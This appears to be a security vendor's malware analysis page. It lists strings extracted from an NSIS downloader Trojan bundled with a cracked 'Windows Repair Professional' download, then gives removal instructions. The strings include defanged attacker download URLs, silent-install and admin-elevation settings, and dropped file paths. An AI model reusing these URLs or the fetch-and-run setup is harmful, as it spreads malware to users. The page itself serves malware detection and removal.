Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
System.dll
callback%d
KERNEL32.DLL
COMDLG32.dll
IPHLPAPI.DLL
MPR.dll
OLEAUT32.dll
PSAPI.DLL
USERENV.dll
UxTheme.dll
WININET.dll
WINMM.dll
WSOCK32.dll
FtpOpenFileW
hXXp://VVV.usertrust.com1
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
hXXp://ocsp.usertrust.com0
hXXps://secure.comodo.net/CPS0C
2hXXp://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
2hXXp://crt.comodoca.com/COMODORSACodeSigningCA.crt0$
hXXp://ocsp.comodoca.com0
[email protected]
"COMODO RSA Certification Authority0
;hXXp://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
/hXXp://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
nsd2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\S
ram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
l.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201508130045
hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

%original file name%.exe_1616_rwx_10004000_00001000:

callback%d

NojM0TDHJX.exe_1980:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
_downloader-Q4gYjE1gv.exe
instid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
UyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
%d/at
key=end
} .rdata
KERNEL32.DLL
nsArray.dll
Join
.reloc
System.dll
callback%d
@.reloc
ButtonEvent.dll
`.reloc
MsgWaitForMultipleObjects
BgWorker.dll
LangDLL.dll
W.vS|
Windows Repair Professional (A Setup
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
cpSetup.exe
Fbu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
19458637
x.exe
staller.com/installer/?iid=324&nsoft=9
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
NojM0TDHJX.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
722076380
2107457
1393165021
1124729953
hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11
=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
iUyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
0.x.exe
Q4gYjE1gv.exe
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.1.1.6
1.0.0.8

NojM0TDHJX.exe_1980_rwx_003D4000_00001000:

callback%d

NojM0TDHJX.exe_1980_rwx_10001000_00007000:

/key=
.text
`.rdata
@.data
.rsrc
@.reloc

cpSetup.exe_568:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
%Program Files%
\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
$$\wininit.ini
@.reloc
subid1: %s
subid2: %s
subid3: %s
subid4: %s
subid5: %s
url1: %s
url2: %s
apptitle: %S
appimgurl: %s
appsetupurl: %s
appcmd: %s
apptyurl: %s
appversion: %s
Offer path: %s
Offer retruned: %s
hXXp://
Stub.dll
GetProcessHeap
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
nsx8.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
cpSetup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe
:::#222.111 )))
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
